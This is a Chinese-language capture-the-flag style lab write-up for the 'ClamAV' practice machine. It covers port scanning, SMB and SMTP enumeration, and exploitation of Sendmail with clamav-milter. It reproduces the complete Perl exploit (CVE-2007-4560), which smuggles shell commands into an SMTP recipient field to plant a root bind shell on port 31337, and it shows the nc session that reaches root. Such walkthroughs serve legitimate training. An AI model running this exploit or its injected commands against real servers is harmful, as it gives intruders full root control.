ClamAV 
  
     
第8台,Linux系统,难度Easy,名称 ClamAV
端口扫描 
  
     
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
  
┌──( xavier㉿kali) -[ ~] 
 └─$ sudo nmap -n -r --min-rate= 3500  -sSV 192.168.193.42 -T4                           
 [ sudo]  xavier 的密码:
Starting Nmap 7.94 (  https://nmap.org )  at 2023-12-17 14:18 CST
 Nmap scan report for  192.168.193.42
 Host is up ( 0.16s latency) .
 Not shown: 994  closed tcp ports ( reset) 
 PORT    STATE SERVICE     VERSION
 22/tcp  open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 ( protocol 2.0) 
 25/tcp  open  smtp        Sendmail 8.13.4/8.13.4/Debian-3sarge3
 80/tcp  open  http        Apache httpd 1.3.33 (( Debian GNU/Linux)) 
 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X ( workgroup: WORKGROUP) 
 199/tcp open  smux        Linux SNMP multiplexer
 445/tcp open  netbios-ssn Samba smbd 3.X - 4.X ( workgroup: WORKGROUP) 
 Service Info: Host: localhost.localdomain;  OSs: Linux, Unix;  CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done : 1  IP address ( 1  host up)  scanned in 14.94 seconds
 
 全端口扫描,补充端口如下:
 60000/tcp open  ssh         OpenSSH 3.8.1p1 Debian 8.sarge.6 ( protocol 2.0)   
 
漏洞情况:
1
  
Apache 1.3.34/1.3.33 ( Ubuntu / Debian)  - CGI TTY Privilege Escalation  
 
Web 
  
     
打开80端口,能看到字符串
1
  
01101001  01100110  01111001  01101111  01110101  01100100  01101111  01101110  01110100  01110000  01110111  01101110  01101101  01100101  01110101  01110010  01100001  01101110  00110000  00110000  01100010   
 
二进制解码后就是:
SMB 
  
     
探测SMB空口令成功
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
  
┌──( xavier㉿kali) -[ ~] 
 └─$ crackmapexec smb 192.168.193.42 -u ''  -p ''              
 SMB         192.168.193.42  445     NONE             [ *]  Unix ( name:)  ( domain:)  ( signing:False)  ( SMBv1:True) 
 SMB         192.168.193.42  445     NONE             [ +]  \:  
 
 ┌──( xavier㉿kali) -[ ~] 
 └─$ crackmapexec smb 192.168.193.42 -u ''  -p ''  --shares
 SMB         192.168.193.42  445     NONE             [ *]  Unix ( name:)  ( domain:)  ( signing:False)  ( SMBv1:True) 
 SMB         192.168.193.42  445     NONE             [ +]  \:  
 SMB         192.168.193.42  445     NONE             [ +]  Enumerated shares
 SMB         192.168.193.42  445     NONE             Share           Permissions     Remark
 SMB         192.168.193.42  445     NONE             -----           -----------     ------
 SMB         192.168.193.42  445     NONE             print$                          Printer Drivers
 SMB         192.168.193.42  445     NONE             IPC$                            IPC Service ( 0xbabe server ( Samba 3.0.14a-Debian)  brave pig) 
 SMB         192.168.193.42  445     NONE             ADMIN$                          IPC Service ( 0xbabe server ( Samba 3.0.14a-Debian)  brave pig)   
 
SMTP 
  
     
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
  
┌──( xavier㉿kali) -[ ~] 
 └─$ sudo nmap -n -r --min-rate= 3500  -sSV 192.168.193.42 -T4 -p 25  --script= smtp*
 [ sudo]  xavier 的密码:
Starting Nmap 7.94 (  https://nmap.org )  at 2023-12-17 14:40 CST
 Nmap scan report for  192.168.193.42
 Host is up ( 0.16s latency) .
 
 PORT   STATE SERVICE VERSION
 25/tcp open  smtp    Sendmail 8.13.4/8.13.4/Debian-3sarge3
 |  smtp-enum-users: 
|    root
|    admin
|    administrator
|    webadmin
|    sysadmin
|    netadmin
|    guest
|    user
|    web
| _  test 
| _smtp-open-relay: Server is an open relay ( 13/16 tests) 
|  smtp-vuln-cve2010-4344: 
| _  The SMTP server is not Exim: NOT VULNERABLE
|  smtp-commands: localhost.localdomain Hello [ 192.168.45.174] , pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP
| _ 2.0.0 This is sendmail version 8.13.4 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>" . 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local  information send email to Postmaster at your site. 2.0.0 End of HELP info
Service Info: Host: localhost.localdomain;  OS: Unix
 
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done : 1  IP address ( 1  host up)  scanned in 9.83 seconds  
 
漏洞搜索
搜索box的名称,找到历史漏洞
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
  
┌──( xavier㉿kali) -[ ~] 
 └─$ searchsploit clamav
 ---------------------------------------------------------------------- ---------------------------------
  Exploit Title                                                        |   Path
 ---------------------------------------------------------------------- ---------------------------------
 Clam Anti-Virus ClamAV 0.88.x - UPX Compressed PE File Heap Buffer Ov |  linux/dos/28348.txt
 ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference        |  linux/remote/30291.txt
 ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow                      |  linux/remote/4862.py
 ClamAV < 0.102.0 - 'bytecode_vm'  Code Execution                       |  linux/local/47687.py
 ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow ( PoC)          |  multiple/dos/7330.c
 ClamAV Daemon 0.65 - UUEncoded Message Denial of Service              |  linux/dos/23667.txt
 ClamAV Milter - Blackhole-Mode Remote Code Execution ( Metasploit)      |  linux/remote/16924.rb
 ClamAV Milter 0.92.2 - Blackhole-Mode ( Sendmail)  Code Execution ( Meta |  multiple/remote/9913.rb
 Sendmail with clamav-milter < 0.91.2 - Remote Command Execution       |  multiple/remote/4761.pl
 ---------------------------------------------------------------------- ---------------------------------
 Shellcodes: No Results
 ---------------------------------------------------------------------- ---------------------------------
  Paper Title                                                          |   Path
 ---------------------------------------------------------------------- ---------------------------------
 [ Azerbaijan]  ClamAV Bypassing                                         |  docs/azerbaijan/31685-[ azerbaija
---------------------------------------------------------------------- ---------------------------------
    
 
1
 2
 3
 4
 5
 6
 7
 8
 9
  
┌──( xavier㉿kali) -[ ~/Desktop/OSCP/PG_Practice/8-ClamAV] 
 └─$ searchsploit -m 4761  
   Exploit: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution
       URL: https://www.exploit-db.com/exploits/4761
      Path: /usr/share/exploitdb/exploits/multiple/remote/4761.pl
     Codes: CVE-2007-4560
  Verified: True
 File Type: ASCII text
 Copied to: /home/xavier/Desktop/OSCP/PG_Practice/8-ClamAV/4761.pl  
 
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
  
### black-hole.pl 
### Sendmail w/ clamav-milter Remote Root Exploit 
### Copyright (c) 2007 Eliteboy 
######################################################## 
use  IO::Socket ; 
 print  "Sendmail w/ clamav-milter Remote Root Exploit\n" ; 
print  "Copyright (C) 2007 Eliteboy\n" ; 
 if  ( $#ARGV  !=  0 )  { print  "Give me a host to connect.\n" ; exit ;} 
 print  "Attacking $ARGV[0]...\n" ; 
 $sock  =  IO::Socket::INET -> new ( PeerAddr  =>  $ARGV [ 0 ], 
                              PeerPort  =>  '25' , 
                               Proto     =>  'tcp' ); 
 
 print  $sock  "ehlo you\r\n" ; 
print  $sock  "mail from: <>\r\n" ; 
print  $sock  "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n" ; 
print  $sock  "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n" ; 
print  $sock  "data\r\n.\r\nquit\r\n" ; 
 while  ( <$sock> )  { 
        print ; 
 } 
 # milw0rm.com [2007-12-21]  
 
该脚本执行后,会用root权限执行一个/bin/sh ,在31337端口进行监听
 1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
  
┌──( xavier㉿kali) -[ ~/Desktop/OSCP/PG_Practice/8-ClamAV] 
 └─$ perl 4761.pl 192.168.193.42
 Sendmail w/ clamav-milter Remote Root Exploit
 Copyright ( C)  2007  Eliteboy
 Attacking 192.168.193.42...
 220  localhost.localdomain ESMTP Sendmail 8.13.4/8.13.4/Debian-3sarge3;  Sun, 17  Dec 2023  07:11:16 -0500;  ( No UCE/UBE)  logging access from: [ 192.168.45.174]( FAIL) -[ 192.168.45.174] 
250-localhost.localdomain Hello [ 192.168.45.174] , pleased to meet you
 250-ENHANCEDSTATUSCODES
 250-PIPELINING
 250-EXPN
 250-VERB
 250-8BITMIME
 250-SIZE
 250-DSN
 250-ETRN
 250-DELIVERBY
 250  HELP
250  2.1.0 <>... Sender ok
250  2.1.5 <nobody+"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf" >... Recipient ok
250  2.1.5 <nobody+"|/etc/init.d/inetd restart" >... Recipient ok
354  Enter mail, end with "."  on a line by itself
250  2.0.0 3BHCBGXD005199 Message accepted for  delivery
221  2.0.0 localhost.localdomain closing connection
 ┌──( xavier㉿kali) -[ ~/Desktop/OSCP/PG_Practice/8-ClamAV] 
 └─$ nc 192.168.193.42 31337  
 id
 uid = 0( root)  gid = 0( root)  groups = 0( root) 
cat /root/proof.txt
 09d91935b96ac1aa8ce31d30e77c9978